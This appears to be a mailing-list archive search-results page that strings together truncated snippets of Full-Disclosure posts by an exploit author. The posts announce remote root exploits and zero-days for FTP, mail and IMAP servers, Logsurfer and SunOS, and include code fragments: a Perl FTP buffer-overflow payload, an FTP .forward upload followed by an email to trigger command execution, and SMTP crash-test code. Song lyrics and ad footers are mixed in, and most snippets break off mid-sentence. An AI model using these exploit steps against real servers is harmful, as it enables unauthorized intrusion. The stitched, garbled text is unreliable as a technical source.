##Logsurfer default recommendation / configuration Remote Code Execution /
Injection
##discovered by kcope when securing a box
The Logsurfer program distributed by DFN CERT at
http://www.dfn-cert.de/eng/logsurf/
has a ridicolous remote code execution bug in one of its mailing scripts when
it
They got into the town, the enemies,
they crushed the doors, the enemies,
and we laughed in the neighborhoods,
in the first day,
They got into the town, the enemies,
they took brothers, the enemies,
and we looked at the ladies,
the next day,
They got into the town, the enemies,
they burned us, the
(see attached)
- -kcope
--
GMX FreeMail: 1 GB Postfach, 5 E-Mail-Adressen, 10 Free SMS.
Alle Infos und kostenlose Anmeldung: http://www.gmx.net/de/go/freemail
/*
SunOS 5.10 Remote ICMP Kernel Crash Exploit by kcope
Null Pointer Dereference in Kernel Space
Seems to work only if attacked in
well,
clamav-milter prior to 0.91.2 //CVE-2007-4560
### black-hole.pl
### Sendmail w/ clamav-milter Remote Root Exploit
### Copyright (c) 2007 Eliteboy
use IO::Socket;
print "Sendmail w/ clamav-milter Remote Root Exploit\n";
print "Copyrigh
You don't believe in TESO!
GO EXPLOIT BIND #!+$# AS A PIONEER!
Merry Christmas,
kcdarookie
--
Pt! Schon vom neuen GMX MultiMessenger gehört?
Der kann`s mit allen: http://www.gmx.net/de/go/multimessenger?did=10
___
Full-Disclosure -
exploiting "features"
(see attached)
- -kcope / 2007
--
Pt! Schon vom neuen GMX MultiMessenger gehört?
Der kann`s mit allen: http://www.gmx.net/de/go/multimessenger
#!python
# (C) 2007 kcope production
from ftplib import FTP
import sys
import socket
print "Sendmail/Postfix
Look this also seems to work on sendmail. Not verified tough.
--
GMX FreeMail: 1 GB Postfach, 5 E-Mail-Adressen, 10 Free SMS.
Alle Infos und kostenlose Anmeldung: http://www.gmx.net/de/go/freemail
___
Full-Disclosure - We believe in it.
Charter: http://
privileges than that.
Login to FTP server
>telnet box 21
>USER rootkey
>PASS rootkey123
put .forward
Now send an email to user rootkey.
>telnet box 25
>mail from: rootkey
>rcpt to: rootkey
>data
>.
RESULT:
[EMAIL PROTECTED]:~$ ls /tmp/testXXX
/tmp/testXXX
signed,
- -kcop
(see attached)
Mikis Theodorakis & Grigoris Bithikotsis//Tis Dikaiosynis ilie noite:
http://kypros.org/Occupied_Cyprus/epiktitos/audio/patriotic/THEODORAKIS%20&%20BITHIKOTSIS%20-%20Tis%20Dikaiosynis%20Ilie%20Noite.mp3
(see attached)
signed,
eliteb0y/2007
--
Pt! Schon vom neuen GMX MultiMe
"Alla pisteua gia sena,
Alla phantasomouna,
Nomisa pos magapouses,
Kai geliomouna.
Alla pisteua gia sena,
Alla phantasomouna,
Nomisa pos magapouses,
Kai geliomouna."
http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf
http://www.com-winner.com/Alla_pisteua.mp3
http://www.com-winner.
Hello this is kingcope,
attached is an example exploit
--
"Ein Herz für Kinder" - Ihre Spende hilft! Aktion: www.deutschlandsegelt.de
Unser Dankeschön: Ihr Name auf dem Segel der 1. deutschen America's Cup-Yacht!
ftpd-ldpreload.pl
Description: Binary data
__
;
$c = "C";
$a = "C" x 255;
$d = "A" x 450;
print $sock "USER kcope\r\n";
print $sock "PASS remoteroot\r\n";
$x = ;
print $sock "MKD $a\r\n";
print $sock "NLST C*/../C*/../C*/../$d\r\n";
print $sock "QUIT\r\n";
while
o the
hex edit of the xls file.
Best Regards,
kcope
FistFuXXer wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hello kcope,
the vulnerability that you've found isn't an Unicode-based buffer
overflow, Spreadsheet-Perl just converts the string to Unicode and you
can edit it lat
Hello this is kcope,
recently I thought I had discovered a remote preauth vulnerability in
MDaemon latest version (9.0.1/9.0.2).
And it really looked like one in the debugger (OllyDbg) .. so I posted
it to full disclosure.
Afterwards I tried to write an exploit, and yes I succeeded! But the
Hi Solo,
The server is not going to crash, you have to attach a debugger like
ollydbg and see what happens,
it reaches the 4 byte overwrite.
Best regards,
kcope
. Solo schrieb:
Hi,kcope
I test your poc, the server of mdeamon did not crash.
The server send the [RST] to the client to reset the
MDAEMON LATEST VERSION PREAUTH *REMOTE ROOT HOLE*
zeroday discovered by kcope kingcope[at]gmx.net !!!
shouts to alex,wY!,bogus,revoguard,adizeone
Description
There's a remotely exploitable preauthentication hole in Alt-N MDaemon.
It is a Heap Overflow in the IMAP Daemon.
It can be trigger
Shouts to blackzero, alex, wY!, revoguard, bogus, wtfomg and all those
yankees
LOVE TO LISA :-)
genuine advisory by kcope/zeroday discovered by kcope!!! kingcope[at]gmx.net
public disclosure 21. May 2006
vendor was not notified (mail quota exceeded) fuck it
let's get to bus
: packet_disconnect(constchar*fmt,...)
code: packet_disconnect(msg);
i guess thats not exploitable since msg is not user supplied.
any pointers from the list?
- - kcope
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full
hello this is kcope,
i got juarez for you..
lnxFTPDssl_warez.c is a remote r00t exploit
for the latest version of linux-ftpd-ssl.
have fun and send me feedback to kingcope[at]gmx.net
-kc
/*Oct2005 VER2
lol, yeah you're missing something :-)
just give a try on some real box...
best regards,
kcope
Harry Hoffman wrote:
Umm, am I missing something here? It looks like you need to be root to
run this "program"?
In the fbsd one you are trying to write to /etc which has perms:
hello this is kcope,
here's my simple wzdftpd exploit (0day) attached...
wzdftpdwarez.pl
Description: Perl program
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Se
hehelol :-)
imail.pl
Description: Perl program
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Hello this is kcope,
there are two remote vulnerabilities in the latest ALT-N MDaemon imapd
product
i don't know if any of them is exploitable .. the stack based buffer
overflow
seems promising, but it's not preauth so i didn't investigate it further.
1.) Remote denia
hello, this is kcope and i´m bored .. soo
sending an email with an attachment named aux to a Microsoft Outlook
client crashes Outlook, can someone confirm that?
here´s some code to test that
-snip--
use Net::SMTP_auth;
$smtp = Net::SMTP_auth->new('mail.gmx.net
24 matches
Mail list logo